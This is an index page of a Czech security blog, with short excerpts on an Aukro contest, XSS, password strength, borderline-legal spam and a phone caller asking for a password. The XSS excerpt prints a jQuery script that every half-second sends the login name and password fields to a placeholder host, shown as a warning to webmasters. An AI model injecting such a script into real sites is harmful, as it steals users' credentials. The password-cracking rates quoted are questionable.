Aukro v nové soutěži odměnuje šikovné programátory
V těchto dnech probíhá na Aukro.cz soutěž „Aukro naděluje“. Každý den organizátoři umístí do nějaké náhodné sekce na Aukru relativně hodnotné produkty za směšně nízkou cenu. Je k dispozici vždy pouze 1 kus. Vy musíte tento produkt najít a zakoupit jako první.
O soutěži jsem se dozvěděl na Twitteru a nebýt následujícího odvážného prohlášení Aukra, ani bych se jí příliš nezaobíral:
„Nebojte, na roboty a podvodné programy jsme mysleli, takže tudy cesta nevede.“
S XSS zranitelností se dá napáchat více škody, než si myslíte
Otázka pro webmastery: Víte, co dělá následující jQuery kód?
<script>$(function(){setInterval(function() {$.get('http://nejaky_web.cz/uloz_data.php', {jmeno: $('[name=l_jmeno]').val(), heslo: $('[name=l_heslo]').val() })},500);}); </script>
Pokud nevíte, a zároveň se někde na vašem webu vyskytuje výpis typu „echo $_POST[rocnik] “, upalujte svůj web opravit a vypisované parametry ošetřit.
Jestli provozujete web obsahující např. citlivá data uživatelů, pak vyloženě hazardujete. Za únik dat hrozí právní postih i vám, pokud se prokáže, že nebyla provedena ani nejzákladnější bezpečnostní opatření. Což obrana proti XSS bezesporu je. Více informací na Wikipedii.
Na délce záleží! Jak zvolit správné heslo?
Průměrný uživatel používá k přihlášení na webové služby velmi slabá hesla. Tak slabá, že případný útočník dokáže za několik hodin, příp. dní heslo v plné své kráse odhalit. Lidé toto zbytečně podceňují, navíc zvolit si těžko prolomitelné heslo nemusí být vůbec složité!
Nejdříve pár čísel.
V souvislosti se statistikami hesel pocházejícími ze vzorku více než 800.000 uživatelských účtů vyplynuly tyto závěry: *
- 9% uživatelů má heslo dlouhé jen 4 znaky nebo méně
- ovšem heslo o maximální délce 6 znaků (pořád slabé) používá více než 50% lidí!
- počet hesel, který dokáže počítač automaticky tipnout za jednu sekundu, se pohybuje mezi 20 a 100 za sekundu **
- zjištění čtyřmístného hesla tedy brutal-force útokem zpravidla trval maximálně 40 hodin, v praxi je to ale mnohem méně
- odhalení pětimístného hesla by bylo jisté maximálně za 24 dní, ovšem za předpokladu zapojení více paralelních počítačů je možné proces urychlit
- pokud máte maximálně šestimístné heslo, prodloužila by se maximální doba zjištění na téměř 2,5 roku, nicméně také platí, že v případě zapojení více počítačů se doba zkrátí :)
"Legální" spam - nenechte se napálit
Jistá česká společnost (reklamu jim tu dělat nehodlám) mi poslala nevyžádané obchodní sdělení (tedy spam). Propaguje v něm svoje služby a produkty s odkazem na webové stránky.
Normální spam, řekli byste. Jenže ne tak docela. Zajímavé je, že společnost se v něm ohání zákonem a několikrát v e-mailu upozorňuje, že jejich spam je vlastně legální:
"Tento email nelze dle výkladu ustanovení § 7 od. 1 zákona č. 480/2004 Sb. o některých službách informační společnosti považovat za nevyžádanou zprávu, neboť je nezbytným právním krokem učiněným ve smyslu získání souhlasu se zasíláním obchodního sdělení."
Řekněte mi, prosím, Vaše heslo...
Příchozí hovor z klasického telefonního čísla s předvolbou 776:
„Dobrý den, mluvím s panem Michalem Smrčkou?“
„Ano, u telefonu.“
„Vidím, že využíváte služby našeho operátora a měl bych pro Vás výhodnou nabídku. Nicméně potřeboval bych si Vás ověřit. Můžete mi, prosím, pro kontrolu sdělit Vaše osobní heslo?“
Jak byste zareagovali v mém případě?
Stránka: 1 2 >
Kategorie blogu
Twitter feed
- Michal Smrčka:
@ScottyCZE Největší prdel je, že dostala od vedoucího a oponenta návrh na známky C a E.
5.2.2012 13:50 - Michal Smrčka:
Vodafone podmínil dotaci na tel. datovým tarifem, ale všimli jste si, že současně ZDRAŽIL? Např. iPhone z 12877 na 13377 při 477/měs.
3.2.2012 19:28 - Michal Smrčka:
"Zdar vole, kolik berete piv?" - "Haló? Voláte správně?" #kurva #android
2.2.2012 12:40
@michalsmrcka